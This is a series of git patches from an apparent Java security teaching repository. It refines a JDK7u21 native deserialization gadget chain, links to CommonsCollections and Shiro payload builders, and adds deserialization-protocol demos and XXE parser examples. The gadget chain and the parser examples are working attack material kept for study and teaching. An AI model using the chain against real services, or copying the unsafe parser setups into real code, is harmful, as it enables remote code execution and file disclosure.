Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); From 43f431135fd7330cfd61d277ed02d6eb2218d922 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 05:26:50 +0800 Subject: [PATCH 03/10] my own JDK7u21 --- .../java/com/govuln/deserialization/JDK7u21.java | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index e3fb4d0..eb037cc 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -15,6 +15,7 @@ import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.HashMap; +import java.util.HashSet; import java.util.LinkedHashSet; import java.util.Map; @@ -29,24 +30,25 @@ public static void main(String[] args) throws Exception { String zeroHashCodeStr = "f5a5a608"; + // 实例化一个map,并添加Magic Number为key,也就是f5a5a608,value先随便设置一个值 HashMap map = new HashMap(); map.put(zeroHashCodeStr, "foo"); + // 实例化AnnotationInvocationHandler类 Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); handlerConstructor.setAccessible(true); - InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map); - setFieldValue(tempHandler, "type", Templates.class); + // 为tempHandler创造一层代理 Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); - LinkedHashSet set = new LinkedHashSet(); // maintain order + // 实例化HashSet,并将两个对象放进去 + HashSet set = new HashSet(); // maintain order set.add(templates); set.add(proxy); - setFieldValue(templates, "_auxClasses", null); - setFieldValue(templates, "_class", null); - - map.put(zeroHashCodeStr, templates); // swap in real object + // 将恶意templates设置到map中 + map.put(zeroHashCodeStr, templates); ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(barr); From b9847809da5a39456cb229a12688ee5e2efd13f5 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 21:54:39 +0800 Subject: [PATCH 04/10] =?UTF-8?q?=E4=BD=BF=E7=94=A8LinkedHashSet=E8=A7=A3?= =?UTF-8?q?=E5=86=B3=E6=9C=89=E6=97=B6=E5=80=99=E6=97=A0=E6=B3=95=E8=A7=A6?= =?UTF-8?q?=E5=8F=91=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E7=9A=84=E9=97=AE?= =?UTF-8?q?=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 原因是templates与proxy是有顺序的,如果用HashSet将丢掉顺序,这样有概率无法触发 --- general/pom.xml | 14 ++------------ .../java/com/govuln/deserialization/JDK7u21.java | 2 +- 2 files changed, 3 insertions(+), 13 deletions(-) diff --git a/general/pom.xml b/general/pom.xml index 9153046..1d58119 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.7 - 1.7 + 1.6 + 1.6 @@ -96,15 +96,5 @@ - - - org.apache.maven.plugins - maven-compiler-plugin - - 7 - 7 - - - diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java index eb037cc..a7824f5 100644 --- a/general/src/main/java/com/govuln/deserialization/JDK7u21.java +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -43,7 +43,7 @@ public static void main(String[] args) throws Exception { Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); // 实例化HashSet,并将两个对象放进去 - HashSet set = new HashSet(); // maintain order + HashSet set = new LinkedHashSet(); set.add(templates); set.add(proxy); From 635e63d641d508ba4e63313336b8750298c41004 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 7 Jul 2021 23:42:18 +0800 Subject: [PATCH 05/10] update manual --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index dbfc6f7..cc8c809 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,7 @@ - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) +- [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) ## Demo代码 @@ -42,6 +43,7 @@ - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) - 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: From 7371e48a2af6eeb518523f5e88ba55238607e182 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 9 Jul 2021 03:29:44 +0800 Subject: [PATCH 06/10] add serialization module --- general/pom.xml | 17 +++++++ .../com/govuln/serialization/Application.java | 47 +++++++++++++++++++ .../com/govuln/serialization/Converter.java | 39 +++++++++++++++ .../com/govuln/serialization/model/Card.java | 12 +++++ .../com/govuln/serialization/model/User.java | 15 ++++++ 5 files changed, 130 insertions(+) create mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/Converter.java create mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java create mode 100644 general/src/main/java/com/govuln/serialization/model/User.java diff --git a/general/pom.xml b/general/pom.xml index 1d58119..97a028b 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -48,6 +48,13 @@ commons-codec 1.15 + + + commons-io + commons-io + 2.10.0 + + @@ -96,5 +103,15 @@ + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java new file mode 100644 index 0000000..65c0712 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Application.java @@ -0,0 +1,47 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Hex; +import org.apache.commons.io.IOUtils; +import static java.io.ObjectStreamConstants.*; + +import java.io.*; + +public class Application { + public static void main(String[] args) throws Exception + { + write(); + read(); + } + + public static void write() throws Exception + { + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(new User()); + + String data = Hex.encodeHexString(byteSteam.toByteArray()); + System.out.println(data); + ProcessBuilder builder = new ProcessBuilder( + "java", + "-jar", + "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", + data); + InputStream is = builder.start().getInputStream(); + IOUtils.copy(is, System.out); + } + + public static void read() throws Exception + { + Object[] data = { + STREAM_MAGIC, STREAM_VERSION, + TC_STRING, + "123123", + }; + byte[] bs = Converter.toBytes(data); + System.out.println(Hex.encodeHexString(bs)); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); + Object obj = ois.readObject(); + System.out.println(obj); + } +} diff --git a/general/src/main/java/com/govuln/serialization/Converter.java b/general/src/main/java/com/govuln/serialization/Converter.java new file mode 100644 index 0000000..d3b6ed4 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/Converter.java @@ -0,0 +1,39 @@ +package com.govuln.serialization; + +import java.io.ByteArrayOutputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.ObjectOutputStream; + +public class Converter { + public static byte[] toBytes(Object[] objs) throws IOException { + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + DataOutputStream dos = new DataOutputStream(baos); + for (Object obj : objs) { + treatObject(dos, obj); + } + dos.close(); + return baos.toByteArray(); + } + + public static void treatObject(DataOutputStream dos, Object obj) + throws IOException { + if (obj instanceof Byte) { + dos.writeByte((Byte) obj); + } else if (obj instanceof Short) { + dos.writeShort((Short) obj); + } else if (obj instanceof Integer) { + dos.writeInt((Integer) obj); + } else if (obj instanceof Long) { + dos.writeLong((Long) obj); + } else if (obj instanceof String) { + dos.writeUTF((String) obj); + } else { + ByteArrayOutputStream ba = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(ba); + oos.writeObject(obj); + oos.close(); + dos.write(ba.toByteArray(), 4, ba.size() - 4); // 4 = skip the header + } + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java new file mode 100644 index 0000000..f73fbfc --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/model/Card.java @@ -0,0 +1,12 @@ +package com.govuln.serialization.model; + +import java.io.Serializable; + +public class Card implements Serializable { + public Integer value; + + public Card() + { + this.value = 100; + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java new file mode 100644 index 0000000..8707855 --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/model/User.java @@ -0,0 +1,15 @@ +package com.govuln.serialization.model; + +import java.io.Serializable; + +public class User implements Serializable { + protected String name; + protected Card card; + + public User() + { + this.name = "Bob"; + this.card = new Card(); + } + +} From 30881f4796a4278899371269bfdbc49888bfa2b9 Mon Sep 17 00:00:00 2001 From: phith0n Date: 2022年3月18日 01:58:36 +0800 Subject: [PATCH 07/10] add a new section --- README.md | 10 +++- general/general.iml | 19 -------- .../com/govuln/serialization/Application.java | 47 ------------------- .../serialization/UserSerialization.java | 24 ++++++++++ .../com/govuln/serialization/model/Card.java | 12 ----- .../com/govuln/serialization/model/User.java | 11 +++-- 6 files changed, 39 insertions(+), 84 deletions(-) delete mode 100644 general/general.iml delete mode 100644 general/src/main/java/com/govuln/serialization/Application.java create mode 100644 general/src/main/java/com/govuln/serialization/UserSerialization.java delete mode 100644 general/src/main/java/com/govuln/serialization/model/Card.java diff --git a/README.md b/README.md index cc8c809..d6a7031 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,7 @@ - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) - [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) +- [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) ## Demo代码 @@ -42,8 +43,8 @@ - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) - 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) -- 简化版Java原生利用链 [JDK7u21](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/JDK7u21.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](general/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: @@ -51,3 +52,8 @@ Shiro反序列化: - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) + +自研反序列化分析工具: + +- zkar: +- 如何使用zkar修复SerialVersionUID不匹配的问题: diff --git a/general/general.iml b/general/general.iml deleted file mode 100644 index 7ee5fc5..0000000 --- a/general/general.iml +++ /dev/null @@ -1,19 +0,0 @@ - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/general/src/main/java/com/govuln/serialization/Application.java b/general/src/main/java/com/govuln/serialization/Application.java deleted file mode 100644 index 65c0712..0000000 --- a/general/src/main/java/com/govuln/serialization/Application.java +++ /dev/null @@ -1,47 +0,0 @@ -package com.govuln.serialization; - -import com.govuln.serialization.model.User; -import org.apache.commons.codec.binary.Hex; -import org.apache.commons.io.IOUtils; -import static java.io.ObjectStreamConstants.*; - -import java.io.*; - -public class Application { - public static void main(String[] args) throws Exception - { - write(); - read(); - } - - public static void write() throws Exception - { - ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); - ObjectOutputStream oos = new ObjectOutputStream(byteSteam); - oos.writeObject(new User()); - - String data = Hex.encodeHexString(byteSteam.toByteArray()); - System.out.println(data); - ProcessBuilder builder = new ProcessBuilder( - "java", - "-jar", - "D:\\program\\SerializationDumper\\SerializationDumper-v1.13.jar", - data); - InputStream is = builder.start().getInputStream(); - IOUtils.copy(is, System.out); - } - - public static void read() throws Exception - { - Object[] data = { - STREAM_MAGIC, STREAM_VERSION, - TC_STRING, - "123123", - }; - byte[] bs = Converter.toBytes(data); - System.out.println(Hex.encodeHexString(bs)); - ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bs)); - Object obj = ois.readObject(); - System.out.println(obj); - } -} diff --git a/general/src/main/java/com/govuln/serialization/UserSerialization.java b/general/src/main/java/com/govuln/serialization/UserSerialization.java new file mode 100644 index 0000000..d20a7af --- /dev/null +++ b/general/src/main/java/com/govuln/serialization/UserSerialization.java @@ -0,0 +1,24 @@ +package com.govuln.serialization; + +import com.govuln.serialization.model.User; +import org.apache.commons.codec.binary.Base64; + +import java.io.*; + +public class UserSerialization { + public static void main(String[] args) throws Exception + { + write(); + } + + public static void write() throws Exception + { + User user = new User("Bob"); + user.setParent(new User("Josua")); + ByteArrayOutputStream byteSteam = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(byteSteam); + oos.writeObject(user); + + System.out.println(Base64.encodeBase64String(byteSteam.toByteArray())); + } +} diff --git a/general/src/main/java/com/govuln/serialization/model/Card.java b/general/src/main/java/com/govuln/serialization/model/Card.java deleted file mode 100644 index f73fbfc..0000000 --- a/general/src/main/java/com/govuln/serialization/model/Card.java +++ /dev/null @@ -1,12 +0,0 @@ -package com.govuln.serialization.model; - -import java.io.Serializable; - -public class Card implements Serializable { - public Integer value; - - public Card() - { - this.value = 100; - } -} diff --git a/general/src/main/java/com/govuln/serialization/model/User.java b/general/src/main/java/com/govuln/serialization/model/User.java index 8707855..bda5098 100644 --- a/general/src/main/java/com/govuln/serialization/model/User.java +++ b/general/src/main/java/com/govuln/serialization/model/User.java @@ -4,12 +4,15 @@ public class User implements Serializable { protected String name; - protected Card card; + protected User parent; - public User() + public User(String name) { - this.name = "Bob"; - this.card = new Card(); + this.name = name; } + public void setParent(User parent) + { + this.parent = parent; + } } From 35f83ede0b6ed40204fa699589e43a4b4cf3cae5 Mon Sep 17 00:00:00 2001 From: phith0n Date: 2024年8月12日 16:40:30 +0800 Subject: [PATCH 08/10] added XXE related examples --- general/pom.xml | 6 ++-- .../govuln/xxe/DocumentBuilderExample.java | 18 ++++++++++++ .../java/com/govuln/xxe/SAXParserExample.java | 23 +++++++++++++++ .../java/com/govuln/xxe/XMLReaderExample.java | 22 +++++++++++++++ .../java/com/govuln/xxe/XMLStreamExample.java | 28 +++++++++++++++++++ .../govuln/xxe/XPathExpressionExample.java | 22 +++++++++++++++ 6 files changed, 115 insertions(+), 4 deletions(-) create mode 100644 general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/SAXParserExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLReaderExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XMLStreamExample.java create mode 100644 general/src/main/java/com/govuln/xxe/XPathExpressionExample.java diff --git a/general/pom.xml b/general/pom.xml index 97a028b..29d9524 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.6 - 1.6 + 8 + 8 @@ -54,8 +54,6 @@ commons-io 2.10.0 - - diff --git a/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java new file mode 100644 index 0000000..3111c38 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/DocumentBuilderExample.java @@ -0,0 +1,18 @@ +package com.govuln.xxe; + +import org.w3c.dom.Document; +import javax.xml.parsers.DocumentBuilder; +import javax.xml.parsers.DocumentBuilderFactory; +import java.io.ByteArrayInputStream; + +public class DocumentBuilderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + DocumentBuilder db = DocumentBuilderFactory.newInstance().newDocumentBuilder(); + Document doc = db.parse(new ByteArrayInputStream(data.getBytes())); + System.out.println(doc.getDocumentElement().getTextContent()); + } +} diff --git a/general/src/main/java/com/govuln/xxe/SAXParserExample.java b/general/src/main/java/com/govuln/xxe/SAXParserExample.java new file mode 100644 index 0000000..46fa054 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/SAXParserExample.java @@ -0,0 +1,23 @@ +package com.govuln.xxe; + +import org.xml.sax.helpers.DefaultHandler; + +import javax.xml.parsers.SAXParser; +import javax.xml.parsers.SAXParserFactory; +import java.io.ByteArrayInputStream; + +public class SAXParserExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + SAXParser parser = SAXParserFactory.newInstance().newSAXParser(); + + parser.parse(new ByteArrayInputStream(data.getBytes()), new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLReaderExample.java b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java new file mode 100644 index 0000000..459a222 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XMLReaderExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import org.xml.sax.XMLReader; +import org.xml.sax.helpers.DefaultHandler; +import org.xml.sax.helpers.XMLReaderFactory; + +public class XMLReaderExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XMLReader reader = XMLReaderFactory.createXMLReader(); + reader.setContentHandler(new DefaultHandler() { + public void characters(char[] ch, int start, int length) { + System.out.print(new String(ch, start, length)); + } + }); + reader.parse(new InputSource(data)); + } +} diff --git a/general/src/main/java/com/govuln/xxe/XMLStreamExample.java b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java new file mode 100644 index 0000000..0173a44 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XMLStreamExample.java @@ -0,0 +1,28 @@ +package com.govuln.xxe; + +import javax.xml.stream.XMLInputFactory; +import javax.xml.stream.XMLStreamReader; +import java.io.*; + +public class XMLStreamExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + InputStream input = new ByteArrayInputStream(data.getBytes()); + XMLInputFactory factory = XMLInputFactory.newFactory(); + XMLStreamReader reader = factory.createXMLStreamReader(input); + + while (reader.hasNext()) { + reader.next(); + if (reader.isStartElement()) { + System.out.println("Start: " + reader.getLocalName()); + } else if (reader.isEndElement()) { + System.out.println("End: " + reader.getLocalName()); + } else if (reader.hasText()) { + System.out.println("Data: " + reader.getText().trim()); + } + } + } +} diff --git a/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java new file mode 100644 index 0000000..9b15047 --- /dev/null +++ b/general/src/main/java/com/govuln/xxe/XPathExpressionExample.java @@ -0,0 +1,22 @@ +package com.govuln.xxe; + +import org.xml.sax.InputSource; +import javax.xml.xpath.XPath; +import javax.xml.xpath.XPathExpression; +import javax.xml.xpath.XPathFactory; +import java.io.ByteArrayInputStream; + +public class XPathExpressionExample { + public static void main(String[] args) throws Exception { + String data = "\n" + + " ]>\n" + + "&xxe;"; + XPathFactory xPathFactory = XPathFactory.newInstance(); + XPath xpath = xPathFactory.newXPath(); + XPathExpression xPathExpr = xpath.compile("/foo/text()"); + + String result = xPathExpr.evaluate(new InputSource(data)); + System.out.println(result); + } +} From 569ed3eb6e3426ba3617228a0bda16d33e3bf354 Mon Sep 17 00:00:00 2001 From: phith0n Date: Wed, 9 Apr 2025 19:57:08 +0800 Subject: [PATCH 09/10] rename folder name --- {general => jdk8}/bytecodes/Foo.java | 0 {general => jdk8}/bytecodes/Hello.java | 0 .../bytecodes/HelloTemplatesImpl.java | 0 {general => jdk8}/pom.xml | 29 +++++++++++++++++++ .../src/main/java/com/govuln/beans/Cat.java | 0 .../main/java/com/govuln/bytes/HelloBCEL.java | 0 .../com/govuln/bytes/HelloClassLoader.java | 0 .../com/govuln/bytes/HelloDefineClass.java | 0 .../com/govuln/bytes/HelloTemplatesImpl.java | 0 .../java/com/govuln/client/JNDIClient.java | 14 +++++++++ .../java/com/govuln/client/LDAPClient.java | 21 ++++++++++++++ .../java/com/govuln/client/RMIClient.java | 9 ++++++ .../deserialization/CommonsBeanutils1.java | 0 .../deserialization/CommonsCollections1.java | 0 .../CommonsCollections1For4.java | 0 .../deserialization/CommonsCollections2.java | 0 .../CommonsCollections2TemplatesImpl.java | 0 .../deserialization/CommonsCollections3.java | 0 .../CommonsCollections3For4.java | 0 .../deserialization/CommonsCollections6.java | 0 .../CommonsCollections6For4.java | 0 .../CommonsCollections6Multiple.java | 0 .../CommonsCollectionsIntro.java | 0 .../CommonsCollectionsIntro2.java | 0 .../CommonsCollectionsIntro3.java | 0 .../com/govuln/deserialization/JDK7u21.java | 0 .../TemplatesImplDeserialization.java | 0 .../com/govuln/deserialization/URLDNS.java | 0 jdk8/src/main/java/com/govuln/js/Eval.java | 20 +++++++++++++ .../com/govuln/serialization/Converter.java | 0 .../serialization/UserSerialization.java | 0 .../com/govuln/serialization/model/User.java | 0 .../govuln/xxe/DocumentBuilderExample.java | 0 .../java/com/govuln/xxe/SAXParserExample.java | 0 .../java/com/govuln/xxe/XMLReaderExample.java | 0 .../java/com/govuln/xxe/XMLStreamExample.java | 0 .../govuln/xxe/XPathExpressionExample.java | 0 .../src/main/java/evil/EvilTemplatesImpl.java | 0 .../src/main/java/evil/Hello.java | 0 jdk8/src/main/resources/eval.js | 4 +++ 40 files changed, 97 insertions(+) rename {general => jdk8}/bytecodes/Foo.java (100%) rename {general => jdk8}/bytecodes/Hello.java (100%) rename {general => jdk8}/bytecodes/HelloTemplatesImpl.java (100%) rename {general => jdk8}/pom.xml (81%) rename {general => jdk8}/src/main/java/com/govuln/beans/Cat.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloBCEL.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloClassLoader.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloDefineClass.java (100%) rename {general => jdk8}/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/client/JNDIClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/LDAPClient.java create mode 100644 jdk8/src/main/java/com/govuln/client/RMIClient.java rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/JDK7u21.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/deserialization/URLDNS.java (100%) create mode 100644 jdk8/src/main/java/com/govuln/js/Eval.java rename {general => jdk8}/src/main/java/com/govuln/serialization/Converter.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/UserSerialization.java (100%) rename {general => jdk8}/src/main/java/com/govuln/serialization/model/User.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/DocumentBuilderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/SAXParserExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLReaderExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XMLStreamExample.java (100%) rename {general => jdk8}/src/main/java/com/govuln/xxe/XPathExpressionExample.java (100%) rename {general => jdk8}/src/main/java/evil/EvilTemplatesImpl.java (100%) rename {general => jdk8}/src/main/java/evil/Hello.java (100%) create mode 100644 jdk8/src/main/resources/eval.js diff --git a/general/bytecodes/Foo.java b/jdk8/bytecodes/Foo.java similarity index 100% rename from general/bytecodes/Foo.java rename to jdk8/bytecodes/Foo.java diff --git a/general/bytecodes/Hello.java b/jdk8/bytecodes/Hello.java similarity index 100% rename from general/bytecodes/Hello.java rename to jdk8/bytecodes/Hello.java diff --git a/general/bytecodes/HelloTemplatesImpl.java b/jdk8/bytecodes/HelloTemplatesImpl.java similarity index 100% rename from general/bytecodes/HelloTemplatesImpl.java rename to jdk8/bytecodes/HelloTemplatesImpl.java diff --git a/general/pom.xml b/jdk8/pom.xml similarity index 81% rename from general/pom.xml rename to jdk8/pom.xml index 29d9524..fb1091e 100644 --- a/general/pom.xml +++ b/jdk8/pom.xml @@ -54,6 +54,35 @@ commons-io 2.10.0 + + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + org.yaml + snakeyaml + 1.33 + 